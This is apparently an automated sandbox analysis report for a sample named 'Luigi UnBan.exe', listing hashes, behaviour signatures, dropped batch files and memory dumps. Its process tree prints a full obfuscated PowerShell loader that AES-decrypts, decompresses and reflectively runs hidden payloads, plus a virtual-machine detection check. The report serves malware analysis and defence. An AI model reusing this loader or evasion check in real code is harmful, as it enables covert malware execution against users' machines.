Overview

overview

10

Static

static

3

Luigi UnBan.exe

windows7-x64

8

Luigi UnBan.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    12-11-2024 05:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Luigi UnBan.exe

  • Size

    178.2MB

  • MD5

    fdaf5b201a0e1c706e755cf2dcf6adb4

  • SHA1

    015461363ad9a3897d2ea5deda2fa44fe57756f3

  • SHA256

    0f3a0a876e198379b45b75a0c06ee8f3cab91eb26fd868fab769ed72b804f600

  • SHA512

    cc0e9a65170e318a4faad0a28aa7458dc0367027b7419049b0dce2baa1df535e7f776395b904be8466b055b1a40a97317cead9adb96afde637e82343f4d1ba91

  • SSDEEP

    1572864:3gm3YzFXmdksvLt/u5ZnKBE5MoDNU0gj67dnHE7:3gm3YYdkqZu6E5Mg7dK

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe
    "C:\Users\Admin\AppData\Local\Temp\Luigi UnBan.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:468
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic diskdrive get Model
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2108
      • C:\Windows\system32\findstr.exe
        findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
        3⤵
          PID:2144
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2456

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Win32Temp.bat
      Filesize

      7.0MB

      MD5

      0e7be50d14359ee381e440f14a9b4ddf

      SHA1

      b3c849e1157eba02e7f0403655db4851623a6f10

      SHA256

      2d008467a42b452490542f14ce735f0a628a64f3e75d86698d8a8da86d0580bd

      SHA512

      0e7e5e81e300b544587d7662b4135600673f4230658a7a81e9a295276aa7c4f0cbfc8c75df212616355bc460592373f4d4a7f6d1dc3b7a0594c60e7f5c98f87c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Win64Temp.bat
      Filesize

      478KB

      MD5

      09c4764995d1f2e96d0a228743f2425e

      SHA1

      0a755c43e147141ec0e9d96d243765af66d1e8a0

      SHA256

      c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab

      SHA512

      856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e

      Download Submit

    • memory/2220-70-0x0000000004DD0000-0x0000000005000000-memory.dmp

      Filesize

      2.2MB

      Download

    • memory/2220-66-0x0000000002520000-0x0000000002530000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-18-0x0000000001D20000-0x0000000001D30000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-22-0x00000001402DD000-0x00000001402DE000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2220-23-0x0000000003FA0000-0x0000000004650000-memory.dmp

      Filesize

      6.7MB

      Download

    • memory/2220-27-0x0000000001D50000-0x0000000001D60000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-31-0x0000000004830000-0x0000000004A00000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2220-58-0x0000000003660000-0x0000000003700000-memory.dmp

      Filesize

      640KB

      Download

    • memory/2220-5-0x0000000002B70000-0x0000000003000000-memory.dmp

      Filesize

      4.6MB

      Download

    • memory/2220-14-0x0000000001CF0000-0x0000000001D00000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-62-0x0000000002500000-0x0000000002510000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-54-0x00000000020C0000-0x00000000020D0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-50-0x0000000002010000-0x0000000002020000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-43-0x0000000001FE0000-0x0000000001FF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-35-0x0000000001D60000-0x0000000001D70000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-39-0x0000000001FB0000-0x0000000001FC0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2220-9-0x0000000008820000-0x000000000E040000-memory.dmp

      Filesize

      88.1MB

      Download

    • memory/2456-182-0x000000001B290000-0x000000001B572000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2456-183-0x0000000002670000-0x0000000002678000-memory.dmp

      Filesize

      32KB

      Download